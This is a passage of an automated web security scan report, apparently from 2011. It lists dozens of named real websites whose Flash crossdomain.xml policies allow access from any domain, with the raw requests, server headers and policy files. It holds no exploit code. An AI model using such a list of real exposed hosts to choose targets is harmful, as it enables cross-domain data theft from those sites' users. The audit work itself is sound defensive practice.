Host:   http://www.do512.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.do512.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:33 GMT
Server: Apache/2.2.9 (Ubuntu) Phusion_Passenger/3.0.2
Last-Modified: Sun, 21 Feb 2010 21:15:08 GMT
ETag: "8209c-125-48022cfa84f00"
Accept-Ranges: bytes
Content-Length: 293
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 02:14:33 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.do512.com" />
<allow-access-from domain="do512.com" />
<allow-access-from domain="*" />
...[SNIP]...

7.64. http://www.doverpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.doverpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doverpost.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:47 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 1733
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache1.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache1.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.65. http://www.ecademy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecademy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ecademy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 06 Feb 2004 13:54:56 GMT
ETag: "71c2e4-d2-3d2af659c8c00"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.66. http://www.evanovich.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evanovich.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evanovich.com

Response

HTTP/1.1 200 OK
Content-Length: 259
Content-Type: text/xml
Content-Location: http://www.evanovich.com/crossdomain.xml
Last-Modified: Fri, 28 May 2010 17:36:56 GMT
Accept-Ranges: bytes
ETag: "a0f03a5e8cfeca1:5a6f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:34:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.67. http://www.evaphone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evaphone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evaphone.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 04 May 2011 01:03:23 GMT
Content-Type: application/xml
Connection: close
ETag: W/"106-1303986094000"
Last-Modified: Thu, 28 Apr 2011 10:21:34 GMT
Content-Length: 106

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.68. http://www.eveningtribune.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eveningtribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eveningtribune.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:11 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent1.ghm.zope.net
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache7.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.69. http://www.evilhub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evilhub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evilhub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 17 Jan 2010 00:18:40 GMT
ETag: "42d839c-138-2dbc9800"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.70. http://www.fareguru.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fareguru.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fareguru.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=21600
Content-Length: 241
Content-Type: text/xml
Last-Modified: Thu, 23 Dec 2010 01:20:34 GMT
Accept-Ranges: bytes
ETag: "0ddc6983fa2cb1:5314"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:07:13 GMT
Connection: close

...<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*
...[SNIP]...

7.71. http://www.findyourselfinit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findyourselfinit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.findyourselfinit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:35 GMT
Server: Apache
Last-Modified: Fri, 14 Nov 2008 21:37:24 GMT
ETag: "b400de-138-491def94"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="silpada10.com" />
<allow-access-from domain="findyourselfinit.com" />
...[SNIP]...

7.72. http://www.fiserv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fiserv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fiserv.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/xml
Last-Modified: Thu, 12 Feb 2009 17:56:02 GMT
Accept-Ranges: bytes
ETag: "025f42a3b8dc91:13ba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:42:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.73. http://www.flashedition.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flashedition.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Wed, 04 May 2011 00:59:27 GMT
Content-Type: text/xml
Connection: close
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cloudfront.net" />
<allow-access-from domain="cdn.mydigitalpublication.com" />
...[SNIP]...

7.74. http://www.flashflashrevolution.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashflashrevolution.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flashflashrevolution.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:30:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "cc-4bfc8043-0"
Last-Modified: Wed, 26 May 2010 01:58:27 GMT
Content-Type: application/xml
Content-Length: 204

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.75. http://www.fluor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fluor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fluor.com

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 370
Content-Type: text/xml
Last-Modified: Thu, 23 Sep 2010 03:24:03 GMT
ETag: "{C8471683-6354-4FBD-B869-09682B1D8690},2"
Server: Microsoft-IIS/7.0
ResourceTag: rt:C8471683-6354-4FBD-B869-09682B1D8690@00000000002
Exires: Tue, 19 Apr 2011 01:57:15 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Wed, 04 May 2011 01:57:14 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<si
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.76. http://www.focus.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.focus.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.focus.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:17:46 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2009 10:43:24 GMT
ETag: "79d60f-115-4ab4b5cc"
Accept-Ranges: bytes
Content-Length: 277
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request
...[SNIP]...

7.77. http://www.foreclosureradar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foreclosureradar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foreclosureradar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 16 Apr 2011 03:15:36 GMT
ETag: "ba4ef-116-92742600"
Accept-Ranges: bytes
Content-Length: 278
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:29:21 GMT
Vary: Accept-Encoding
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
       <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.78. http://www.fox10tv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox10tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fox10tv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Fri, 15 May 2009 05:45:04 GMT
ETag: "721b69-13a-469ecf23b1800"
Accept-Ranges: bytes
Content-Length: 314
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Wed, 04 May 2011 02:11:00 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" secure="true" />
...[SNIP]...

7.79. http://www.fox19.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox19.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fox19.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac9"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 00:51:23 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:51:23 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.80. http://www.foxtoledo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxtoledo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxtoledo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Fri, 15 May 2009 05:45:04 GMT
ETag: "2b01c9-13a-469ecf23b1800"
Accept-Ranges: bytes
Content-Length: 314
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Wed, 04 May 2011 02:47:31 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" secure="true" />
...[SNIP]...

7.81. http://www.freedownloads.be/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloads.be
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freedownloads.be

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:15 GMT
Server: Apache/2.2.14 (Debian)
Last-Modified: Thu, 01 Oct 2009 08:55:43 GMT
ETag: "6baf9-11c-474dbcffd81c0"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<
...[SNIP]...

7.82. http://www.ftv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 04 Feb 2011 11:43:27 GMT
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Date: Wed, 04 May 2011 03:50:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.83. http://www.gamesforgirlsclub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamesforgirlsclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamesforgirlsclub.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:47:36 GMT
Content-Type: text/xml
Content-Length: 277
Last-Modified: Sun, 08 Feb 2009 03:08:41 GMT
Connection: close
X-Debu: /crossdomain.xml - /crossdomain.xml
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.84. http://www.gamevial.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamevial.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamevial.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 18 Oct 2010 16:41:04 GMT
ETag: "9bda39-62-d7976800"
Accept-Ranges: bytes
Content-Length: 98
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.85. http://www.garnier.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.garnier.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.garnier.com

Response

HTTP/1.0 200 OK
Content-Length: 162
Content-Type: text/xml
Last-Modified: Wed, 10 Jun 2009 14:01:55 GMT
Accept-Ranges: bytes
ETag: "808b83d4e9c91:24d4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Powered-By: 01
Date: Wed, 04 May 2011 02:09:15 GMT
Connection: close

...<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.86. http://www.gartnerstudios.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gartnerstudios.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartnerstudios.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Apr 2010 02:06:32 GMT
ETag: "54b315e-c4-75785a00"
Accept-Ranges: bytes
Content-Length: 196
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:41:00 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.87. http://www.geckobyte.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.geckobyte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.geckobyte.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 03 Jun 2008 19:03:38 GMT
Accept-Ranges: bytes
ETag: "ac10a887acc5c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:42:07 GMT
Connection: close
Content-Length: 275

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd";>
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-http-requ
...[SNIP]...

7.88. http://www.gelaskins.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gelaskins.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gelaskins.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 02 Nov 2010 19:41:11 GMT
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 01:55:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-poli
...[SNIP]...

7.89. http://www.goomradio.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goomradio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goomradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:47 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 09:55:03 GMT
Accept-Ranges: bytes
Content-Length: 280
Cache-Control: max-age=61
Expires: Wed, 04 May 2011 00:48:48 GMT
Vary: Accept-Encoding
X-served-by: goom-cdn02
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-reque
...[SNIP]...

7.90. http://www.hanestravelincomfort.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hanestravelincomfort.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hanestravelincomfort.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 May 2010 23:16:25 GMT
ETag: "12f11db-69-4866dd4b48440"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.91. http://www.hannibal.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hannibal.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hannibal.net

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 00:35:56 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent1.ghm.zope.net
Age: 492
X-Cache: HIT from cache3.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache3.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.92. http://www.heels.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.heels.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

